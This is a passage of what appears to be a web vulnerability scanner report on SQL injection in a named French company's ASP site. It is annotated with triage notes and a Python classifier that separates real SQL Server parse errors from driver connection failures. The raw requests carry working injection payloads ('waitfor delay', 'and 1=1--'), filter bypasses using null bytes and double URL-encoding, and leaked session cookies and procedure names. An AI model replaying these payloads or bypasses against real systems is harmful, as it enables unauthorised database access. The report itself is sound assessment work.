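  * a SQL Server parse error ("Incorrect syntax near", French "syntaxe
    incorrecte vers") means the value reached the query parser;
  * "expects parameter '@x', which was not supplied" after a payload ending
    in "--" means the value reached the text of a stored-procedure call and
    commented out the rest of it (and the message leaks the procedure name);
  * "Cannot generate SSPI context" ("Impossible de générer le contexte SSPI")
    is raised by the ODBC driver while authenticating the connection, before
    any statement is sent, so it says nothing about the injected value.

A separate check is attribution: when the scanner's baseline request already
produces the same error (1.41, 1.45 and 1.46 reuse a request whose siteId is
already injected), the probe added nothing.  Evidence, classify, details,
attributable and SAMPLE are this example's own; the SAMPLE bodies are cut
down from the response snippets shown in the report.
"""
import re
from enum import Enum


class Evidence(Enum):
    SYNTAX_ERROR = "value reached the SQL parser"
    PROC_PARAM_MISSING = "value truncated a stored-procedure call"
    CONNECTION_ERROR = "driver could not connect; not input-dependent"
    NONE = "no database error text"


_SYNTAX = re.compile(r"incorrect syntax near|syntaxe incorrecte vers"
                     r"|unclosed quotation mark", re.I)
_MISSING = re.compile(r"expects parameter '(@\w+)', which was not supplied", re.I)
# "g.n.rer" also matches the report's mis-encoded rendering of "générer"
_CONNECT = re.compile(r"cannot generate sspi context"
                      r"|impossible de g.n.rer le contexte sspi"
                      r"|login failed for user", re.I)
_PROC = re.compile(r"SQL:\[([^\]]+)\]")


def classify(body: str) -> Evidence:
    """Strongest class of database error text present in a response body."""
    if _SYNTAX.search(body):
        return Evidence.SYNTAX_ERROR
    if _MISSING.search(body):
        return Evidence.PROC_PARAM_MISSING
    if _CONNECT.search(body):
        return Evidence.CONNECTION_ERROR
    return Evidence.NONE


def details(body: str) -> dict:
    """Classification plus what the message leaks: the procedure name echoed
    after 'SQL:' and the parameter reported as missing."""
    proc = _PROC.search(body)
    missing = _MISSING.search(body)
    return {"kind": classify(body),
            "procedure": proc.group(1) if proc else None,
            "missing_param": missing.group(1) if missing else None}


def attributable(baseline_body: str, probe_body: str) -> bool:
    """True only when the probe produced statement-level error evidence that
    the baseline request did not already produce."""
    if classify(probe_body) in (Evidence.NONE, Evidence.CONNECTION_ERROR):
        return False
    return details(baseline_body) != details(probe_body)


# Constructed bodies, cut down from the response snippets in the report.
SAMPLE = {
    # the request reused by 1.41, 1.45 and 1.46: siteId already carries
    # ";WAITFOR DELAY '0:0:25'--", so the probe and its baseline look alike
    "vindico_base": (
        "<br>Error Description:Procedure or function "
        "'Track_BannerCreativeImpression_V.1' expects parameter '@campaignId', "
        "which was not supplied.<br>SQL:[Track_BannerCreativeImpression_V.1] "
        "@siteId = 1;WAITFOR DELAY '0:0:25'--"),
    # 1.44: the probe cut the command string at a different point
    "vindico_1_44": (
        "<br>Error Description:Procedure or function "
        "'Track_BannerCreativeImpression_V.1' expects parameter "
        "'@adRotationId', which was not supplied.<br>"
        "SQL:[Track_BannerCreativeImpression_V.1] @siteId = 1860,"),
    # 1.47 and 1.49
    "b2f_syntax": (
        '<div id="MTOP">pageUniverselle.asp: [Microsoft][ODBC SQL Server '
        "Driver][SQL Server]Ligne 1 : syntaxe incorrecte vers '3'.</div>"),
    # 1.51, 1.55 and 1.56
    "b2f_sspi": (
        "<h2>Erreur -2147467259</h2>\n[Microsoft][ODBC SQL Server Driver]"
        "Impossible de g.n.rer le contexte SSPI"),
    # an ordinary page, standing in for a clean baseline
    "b2f_home": "<title>Groupe B2F Concept - Accueil</title>",
}

if __name__ == "__main__":
    for name, body in SAMPLE.items():
        print(f"{name:14s} {details(body)}")
    print("1.41-style probe attributable:",
          attributable(SAMPLE["vindico_base"], SAMPLE["vindico_base"]))
    print("1.51-style probe attributable:",
          attributable(SAMPLE["b2f_home"], SAMPLE["b2f_sspi"]))
```

Feed attributable() the body of the scanner's unmodified request and the body of the probe: the SSPI pages and any probe whose error the baseline already shows come back False, while a parse error or a newly truncated procedure call comes back True, which is the split between the findings worth retesting and those already supported by a different test on this page.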

1.52. http://www.b2f-concept.com/KERNEL/ [U parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.b2f-concept.com
Path:   /KERNEL/

Issue detail

The U parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the U parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The response to the single quote is a 302 to BO/error.asp?URL%20incorrecte. ("incorrect URL"), an application-level rejection rather than a database error, so on its own this is a weak signal. The paired '' request rendering the normal page is consistent with the doubled quote being treated as an escaped quote inside a string literal, and 1.53 confirms the parameter with a time delay.

Request 1

GET /KERNEL/?NODE_ID=59521607-FF21-43C6-8C1B-18C29BB87C78&DB=CLT3&U=DC5AB262-634F-422B-9D27-B7BC29A08D03' HTTP/1.1
Host: www.b2f-concept.com
Proxy-Connection: keep-alive
Referer: http://www.b2f-concept.com/KERNEL/?NODE_ID=2124CD9C-901D-4D4E-A690-79703CC24099&DB=CLT3&U=DC5AB262-634F-422B-9D27-B7BC29A08D03
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDCSABRTBS=OMJBBOLBJEHKODHDHLBBCPDO; VISITEUR=MEMO%5FUIDPWD=False&PWD=&DATE=18%2F03%2F2011+16%3A43%3A51&UID=&ID=%7BC361738E%2DA50B%2D47E3%2D96DC%2DF6DC720282C7%7D; __utmz=179423095.1300463073.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=179423095.587015010.1300463073.1300463073.1300463073.1; __utmc=179423095; __utmb=179423095.1.10.1300463073

Response 1

HTTP/1.1 302 Object moved
Date: Fri, 18 Mar 2011 16:59:32 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Location: BO/error.asp?URL%20incorrecte.
Content-Length: 151
Content-Type: text/html
Cache-control: private

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="BO/error.asp?URL%20incorrecte.">here</a>.</body>

Request 2

GET /KERNEL/?NODE_ID=59521607-FF21-43C6-8C1B-18C29BB87C78&DB=CLT3&U=DC5AB262-634F-422B-9D27-B7BC29A08D03'' HTTP/1.1
Host: www.b2f-concept.com
Proxy-Connection: keep-alive
Referer: http://www.b2f-concept.com/KERNEL/?NODE_ID=2124CD9C-901D-4D4E-A690-79703CC24099&DB=CLT3&U=DC5AB262-634F-422B-9D27-B7BC29A08D03
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDCSABRTBS=OMJBBOLBJEHKODHDHLBBCPDO; VISITEUR=MEMO%5FUIDPWD=False&PWD=&DATE=18%2F03%2F2011+16%3A43%3A51&UID=&ID=%7BC361738E%2DA50B%2D47E3%2D96DC%2DF6DC720282C7%7D; __utmz=179423095.1300463073.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=179423095.587015010.1300463073.1300463073.1300463073.1; __utmc=179423095; __utmb=179423095.1.10.1300463073

Response 2

HTTP/1.1 200 OK
Date: Fri, 18 Mar 2011 16:59:34 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 28702
Content-Type: text/html
Expires: Fri, 18 Mar 2011 15:19:33 GMT
Cache-control: private

<html>
<head>
<meta name="Description" content="Un logiciel de gestion de contenu parce-qu'un site n'est jamais termin&#233; et doit-&#234;tre en constante &#233;volution afin de fid&#233;liser et d
...[SNIP]...

1.53. http://www.b2f-concept.com/KERNEL/ [U parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.b2f-concept.com
Path:   /KERNEL/

Issue detail

The U parameter appears to be vulnerable to SQL injection attacks. The payload 'waitfor%20delay'0%3a0%3a20'-- was submitted in the U parameter. The application took 41933 milliseconds to respond to the request, compared with 1888 milliseconds for the original request, indicating that the injected SQL command caused a time delay.

The 41933 ms response is roughly twice the injected 20 s on top of the 1888 ms baseline, which is consistent with the tainted value being used in two statements per request (1.54 shows the same doubling for the VISITEUR cookie). The response is the full 31212-byte page: the injection leaves no visible trace, so only timing reveals it.

The database appears to be Microsoft SQL Server.

Request

GET /KERNEL/?NODE_ID=2124CD9C-901D-4D4E-A690-79703CC24099&DB=CLT3&U=DC5AB262-634F-422B-9D27-B7BC29A08D03'waitfor%20delay'0%3a0%3a20'-- HTTP/1.1
Host: www.b2f-concept.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDCSABRTBS=OMJBBOLBJEHKODHDHLBBCPDO; VISITEUR=MEMO%5FUIDPWD=False&PWD=&DATE=18%2F03%2F2011+16%3A43%3A51&UID=&ID=%7BC361738E%2DA50B%2D47E3%2D96DC%2DF6DC720282C7%7D

Response

HTTP/1.1 200 OK
Date: Fri, 18 Mar 2011 17:00:15 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 31212
Content-Type: text/html
Expires: Fri, 18 Mar 2011 15:20:15 GMT
Cache-control: private

<html>
<head>
<meta name="Description" content="Soci&#233;t&#233; de Service Informatique (SSII) sp&#233;cialis&#233;e dans la commercialisation en ligne des destinations touristiques. Cr&#233;ation
...[SNIP]...

1.54. http://www.b2f-concept.com/KERNEL/ [VISITEUR cookie]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.b2f-concept.com
Path:   /KERNEL/

Issue detail

The VISITEUR cookie appears to be vulnerable to SQL injection attacks. The payload 'waitfor%20delay'0%3a0%3a20'-- was submitted in the VISITEUR cookie. The application took 41642 milliseconds to respond to the request, compared with 1997 milliseconds for the original request, indicating that the injected SQL command caused a time delay.

As in 1.53 the delay is doubled (41642 ms against 1997 ms). The payload was appended to the DATE field inside the VISITEUR cookie, a persistent cookie the application itself sets with a three-month expiry (see the Set-Cookie headers in 1.51), and the server answered 500 after the delay, so a value the browser stores and replays on every visit reaches a query. Confirm with two further delay values.

The database appears to be Microsoft SQL Server.

Request

GET /KERNEL/ HTTP/1.1
Host: www.b2f-concept.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VISITEUR=MEMO%5FUIDPWD=False&UID=&ID=%7BC361738E%2DA50B%2D47E3%2D96DC%2DF6DC720282C7%7D&PWD=&DATE=18%2F03%2F2011+18%3A47%3A31'waitfor%20delay'0%3a0%3a20'--; ASPSESSIONIDCSABRTBS=JPCCBOLBPAAOMLEEMFCKEBEA; __utmz=179423095.1300463073.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=179423095.587015010.1300463073.1300463073.1300470494.2; __utmc=179423095; __utmb=179423095.1.10.1300470494;

Response (redirected)

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Sat, 19 Mar 2011 01:55:05 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 4863
Content-Type: text/html
Expires: Sat, 19 Mar 2011 00:15:05 GMT
Cache-control: private

<html>
<head>
<meta name="Description" content="Une info">
<title>Groupe B2F Concept - Une info</title>
<base href="http://www.b2f-concept.com/KERNEL/">

<link rel="stylesheet" href="default.css
...[SNIP]...

1.55. http://www.b2f-concept.com/KERNEL/ [__utmb cookie]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.b2f-concept.com
Path:   /KERNEL/

Issue detail

The __utmb cookie appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the __utmb cookie, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Caveat: the error returned is the SSPI connection failure discussed under 1.51 ("Cannot generate SSPI context"), raised while the driver authenticated to SQL Server and not by any statement. The same page came back for every probe in this minute of the 25 Mar pass regardless of payload, so this finding is unconfirmed until retested.

The database appears to be Microsoft SQL Server.

Request

GET /KERNEL/?NODE_ID=59521607-FF21-43C6-8C1B-18C29BB87C78&DB=CLT3&U=DC5AB262-634F-422B-9D27-B7BC29A08D03 HTTP/1.1
Host: www.b2f-concept.com
Proxy-Connection: keep-alive
Referer: http://www.b2f-concept.com/KERNEL/?NODE_ID=2124CD9C-901D-4D4E-A690-79703CC24099&DB=CLT3&U=DC5AB262-634F-422B-9D27-B7BC29A08D03
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDCSABRTBS=OMJBBOLBJEHKODHDHLBBCPDO; VISITEUR=MEMO%5FUIDPWD=False&PWD=&DATE=18%2F03%2F2011+16%3A43%3A51&UID=&ID=%7BC361738E%2DA50B%2D47E3%2D96DC%2DF6DC720282C7%7D; __utmz=179423095.1300463073.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=179423095.587015010.1300463073.1300463073.1300463073.1; __utmc=179423095; __utmb=179423095.1.10.1300463073'

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 25 Mar 2011 17:07:50 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 248
Content-Type: text/html
Expires: Fri, 25 Mar 2011 17:06:50 GMT
Set-Cookie: VISITEUR=MEMO%5FUIDPWD=False&UID=&ID=%7BC361738E%2DA50B%2D47E3%2D96DC%2DF6DC720282C7%7D&PWD=&DATE=25%2F03%2F2011+18%3A07%3A50; expires=Sat, 25-Jun-2011 16:07:50 GMT; path=/
Set-Cookie: ASPSESSIONIDCSDDSRBS=ECAGAOMBHOPJNMDBCJHIFALL; path=/
Cache-control: private


<html>
<head>
<title> - Erreur</title>
<link rel="stylesheet" href="../default.css" type="text/css">
</head>

<body>
<h2>Erreur -2147467259</h2>
[Microsoft][ODBC SQL Server Driver]Impossible de g.n.rer le contexte SSPI
</body>
...[SNIP]...

1.56. http://www.b2f-concept.com/KERNEL/ [__utmc cookie]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.b2f-concept.com
Path:   /KERNEL/

Issue detail

The __utmc cookie appears to be vulnerable to SQL injection attacks. The payload %00' was submitted in the __utmc cookie, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Request

GET /KERNEL/?NODE_ID=59521607-FF21-43C6-8C1B-18C29BB87C78&DB=CLT3&U=DC5AB262-634F-422B-9D27-B7BC29A08D03 HTTP/1.1
Host: www.b2f-concept.com
Proxy-Connection: keep-alive
Referer: http://www.b2f-concept.com/KERNEL/?NODE_ID=2124CD9C-901D-4D4E-A690-79703CC24099&DB=CLT3&U=DC5AB262-634F-422B-9D27-B7BC29A08D03
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDCSABRTBS=OMJBBOLBJEHKODHDHLBBCPDO; VISITEUR=MEMO%5FUIDPWD=False&PWD=&DATE=18%2F03%2F2011+16%3A43%3A51&UID=&ID=%7BC361738E%2DA50B%2D47E3%2D96DC%2DF6DC720282C7%7D; __utmz=179423095.1300463073.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=179423095.587015010.1300463073.1300463073.1300463073.1; __utmc=179423095%00'; __utmb=179423095.1.10.1300463073

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 25 Mar 2011 17:07:41 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 248
Content-Type: text/html
Expires: Fri, 25 Mar 2011 17:06:41 GMT
Set-Cookie: VISITEUR=MEMO%5FUIDPWD=False&UID=&ID=%7BC361738E%2DA50B%2D47E3%2D96DC%2DF6DC720282C7%7D&PWD=&DATE=25%2F03%2F2011+18%3A07%3A41; expires=Sat, 25-Jun-2011 16:07:40 GMT; path=/
Set-Cookie: ASPSESSIONIDCSDDSRBS=OBAGAOMBMKDBJLBLHHHELGEO; path=/
Cache-control: private


<html>
<head>
<title> - Erreur</title>
<link rel="stylesheet" href="../default.css" type="text/css">
</head>

<body>
<h2>Erreur -2147467259</h2>
[Microsoft][ODBC SQL Server Driver]Impossible de générer le contexte SSPI
</body>
...[SNIP]...

1.57. http://www.b2f-concept.com/KERNEL/BO/CONTENUS/SET/SetINFORUB.asp [INFORUB parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.b2f-concept.com
Path:   /KERNEL/BO/CONTENUS/SET/SetINFORUB.asp

Issue detail

The INFORUB parameter appears to be vulnerable to SQL injection attacks. The payload 'waitfor%20delay'0%3a0%3a20'-- was submitted in the INFORUB parameter. The application took 125159 milliseconds to respond to the request, compared with 4726 milliseconds for the original request, indicating that the injected SQL command caused a time delay.

The database appears to be Microsoft SQL Server.

Request

GET /KERNEL/BO/CONTENUS/SET/SetINFORUB.asp?INFORUB={B635DBB9-B21E-40C4-B103-96C56BD4A101}'waitfor%20delay'0%3a0%3a20'--&DB=CLT3 HTTP/1.1
Host: www.b2f-concept.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VISITEUR=MEMO%5FUIDPWD=False&UID=&ID=%7BC361738E%2DA50B%2D47E3%2D96DC%2DF6DC720282C7%7D&PWD=&DATE=18%2F03%2F2011+18%3A47%3A31; ASPSESSIONIDCSABRTBS=JPCCBOLBPAAOMLEEMFCKEBEA; __utmz=179423095.1300463073.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=179423095.587015010.1300463073.1300463073.1300470494.2; __utmc=179423095; __utmb=179423095.1.10.1300470494;

Response (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Sat, 19 Mar 2011 01:57:12 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 26681
Content-Type: text/html
Expires: Sat, 19 Mar 2011 00:16:32 GMT
Cache-control: private

<html>
<head>
<meta name="Description" content="&lt;A href=&quot;http://www.b2f-concept.com/KERNEL/BO/CONTENUS/SET/SetINFORUB.asp?INFORUB={B635DBB9-B21E-40C4-B103-96C56BD4A101}&amp;amp;DB=CLT3&quot;
...[SNIP]...

1.58. http://www.b2f-concept.com/KERNEL/BO/CONTENUS/SET/SetINFORUB.asp [__utmz cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.b2f-concept.com
Path:   /KERNEL/BO/CONTENUS/SET/SetINFORUB.asp

Issue detail

The __utmz cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __utmz cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Request 1

GET /KERNEL/BO/CONTENUS/SET/SetINFORUB.asp HTTP/1.1
Host: www.b2f-concept.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VISITEUR=MEMO%5FUIDPWD=False&UID=&ID=%7BC361738E%2DA50B%2D47E3%2D96DC%2DF6DC720282C7%7D&PWD=&DATE=18%2F03%2F2011+18%3A47%3A31; ASPSESSIONIDCSABRTBS=JPCCBOLBPAAOMLEEMFCKEBEA; __utmz=179423095.1300463073.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)%2527; __utma=179423095.587015010.1300463073.1300463073.1300470494.2; __utmc=179423095; __utmb=179423095.1.10.1300470494;

Response 1

HTTP/1.1 302 Object moved
Connection: close
Date: Sat, 19 Mar 2011 02:04:47 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Location: ../../error.asp?ErrNumber=-2147467259&ErrDescription=[Microsoft][Gestionnaire%20de%20pilotes%20ODBC]%20Source%20de%20données%20introuvable%20et%20nom%20de%20pilote%20non%20spécifié
Content-Length: 320
Content-Type: text/html
Cache-control: private

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="../../error.asp?ErrNumber=-2147467259&amp;ErrDescription=[Microsoft][Gestionnaire%20de%20pilotes%2
...[SNIP]...

Request 2

GET /KERNEL/BO/CONTENUS/SET/SetINFORUB.asp HTTP/1.1
Host: www.b2f-concept.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VISITEUR=MEMO%5FUIDPWD=False&UID=&ID=%7BC361738E%2DA50B%2D47E3%2D96DC%2DF6DC720282C7%7D&PWD=&DATE=18%2F03%2F2011+18%3A47%3A31; ASPSESSIONIDCSABRTBS=JPCCBOLBPAAOMLEEMFCKEBEA; __utmz=179423095.1300463073.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)%2527%2527; __utma=179423095.587015010.1300463073.1300463073.1300470494.2; __utmc=179423095; __utmb=179423095.1.10.1300470494;

Response 2

HTTP/1.1 302 Object moved
Connection: close
Date: Sat, 19 Mar 2011 02:04:49 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Location: ../../../?NODE_ID={8352D499-A167-419A-9559-DD43EE0B1508}&DB=CLT3&U={DC5AB262-634F-422B-9D27-B7BC29A08D03}&S=C288FE1C45F9E2514A46B14F29CC2090
Content-Length: 273
Content-Type: text/html
Cache-control: private

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="../../../?NODE_ID={8352D499-A167-419A-9559-DD43EE0B1508}&amp;DB=CLT3&amp;U={DC5AB262-634F-422B-9D2
...[SNIP]...

1.59. http://www.b2f-concept.com/KERNEL/CSS.asp [id parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.b2f-concept.com
Path:   /KERNEL/CSS.asp

Issue detail

The id parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the id parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /KERNEL/CSS.asp?id={40DF4DFC-BD19-4ACE-A0A8-887728266DD7}'&DB=CLT3 HTTP/1.1
Host: www.b2f-concept.com
Proxy-Connection: keep-alive
Referer: http://www.b2f-concept.com/KERNEL/?NODE_ID=2124CD9C-901D-4D4E-A690-79703CC24099&DB=CLT3&U=DC5AB262-634F-422B-9D27-B7BC29A08D03
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=179423095.1300463073.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=179423095.587015010.1300463073.1300463073.1300463073.1; ASPSESSIONIDCSABRTBS=JPCCBOLBPAAOMLEEMFCKEBEA; VISITEUR=MEMO%5FUIDPWD=False&UID=&ID=%7BC361738E%2DA50B%2D47E3%2D96DC%2DF6DC720282C7%7D&PWD=&DATE=18%2F03%2F2011+18%3A47%3A31

Response 1

HTTP/1.1 500 Internal Server Error
Date: Fri, 18 Mar 2011 17:48:20 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 264
Content-Type: text/html
Cache-control: private

<font face="Arial" size=2>
<p>Microsoft VBScript runtime </font> <font face="Arial" size=2>erreur '800a000d'</font>
<p>
<font face="Arial" size=2>Type mismatch</font>
<p>
<font face="Arial" size=2>/K
...[SNIP]...

Request 2

GET /KERNEL/CSS.asp?id={40DF4DFC-BD19-4ACE-A0A8-887728266DD7}''&DB=CLT3 HTTP/1.1
Host: www.b2f-concept.com
Proxy-Connection: keep-alive
Referer: http://www.b2f-concept.com/KERNEL/?NODE_ID=2124CD9C-901D-4D4E-A690-79703CC24099&DB=CLT3&U=DC5AB262-634F-422B-9D27-B7BC29A08D03
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=179423095.1300463073.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=179423095.587015010.1300463073.1300463073.1300463073.1; ASPSESSIONIDCSABRTBS=JPCCBOLBPAAOMLEEMFCKEBEA; VISITEUR=MEMO%5FUIDPWD=False&UID=&ID=%7BC361738E%2DA50B%2D47E3%2D96DC%2DF6DC720282C7%7D&PWD=&DATE=18%2F03%2F2011+18%3A47%3A31

Response 2

HTTP/1.1 200 OK
Date: Fri, 18 Mar 2011 17:48:22 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 1050
Content-Type: text/css
Expires: Fri, 18 Mar 2011 19:48:22 GMT
Cache-control: private

.test {color:red;}

.Ref-COLA {padding:0px 0px 0px 30px;
color:#888888;
}
#BOTTOM .ContainerBodyUsed .Ref-COLA a { color:#888888; font-family:arial,sans serif; font-size:12px
...[SNIP]...

1.60. http://www.b2f-concept.com/KERNEL/CSS.asp [id parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.b2f-concept.com
Path:   /KERNEL/CSS.asp

Issue detail

The id parameter appears to be vulnerable to SQL injection attacks. The payload 'waitfor%20delay'0%3a0%3a20'-- was submitted in the id parameter. The application took 22308 milliseconds to respond to the request, compared with 6459 milliseconds for the original request, indicating that the injected SQL command caused a time delay.

The database appears to be Microsoft SQL Server.

Request

GET /KERNEL/CSS.asp?id={40DF4DFC-BD19-4ACE-A0A8-887728266DD7}'waitfor%20delay'0%3a0%3a20'--&DB=CLT3 HTTP/1.1
Host: www.b2f-concept.com
Proxy-Connection: keep-alive
Referer: http://www.b2f-concept.com/KERNEL/?NODE_ID=2124CD9C-901D-4D4E-A690-79703CC24099&DB=CLT3&U=DC5AB262-634F-422B-9D27-B7BC29A08D03
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDCSABRTBS=OMJBBOLBJEHKODHDHLBBCPDO; VISITEUR=MEMO%5FUIDPWD=False&PWD=&DATE=18%2F03%2F2011+16%3A43%3A51&UID=&ID=%7BC361738E%2DA50B%2D47E3%2D96DC%2DF6DC720282C7%7D

Response

HTTP/1.1 200 OK
Date: Fri, 18 Mar 2011 16:43:02 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 0
Content-Type: text/css
Expires: Fri, 18 Mar 2011 18:43:01 GMT
Cache-control: private


1.61. http://www.b2f-concept.com/KERNEL/DOC.ASP [id parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.b2f-concept.com
Path:   /KERNEL/DOC.ASP

Issue detail

The id parameter appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the id parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /KERNEL/DOC.ASP?id={75BF6FFD-43C6-474B-A2A0-A68D0CD33C09}'%20and%201%3d1--%20&DB=CLT3 HTTP/1.1
Host: www.b2f-concept.com
Proxy-Connection: keep-alive
Referer: http://www.b2f-concept.com/KERNEL/?NODE_ID=2124CD9C-901D-4D4E-A690-79703CC24099&DB=CLT3&U=DC5AB262-634F-422B-9D27-B7BC29A08D03
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
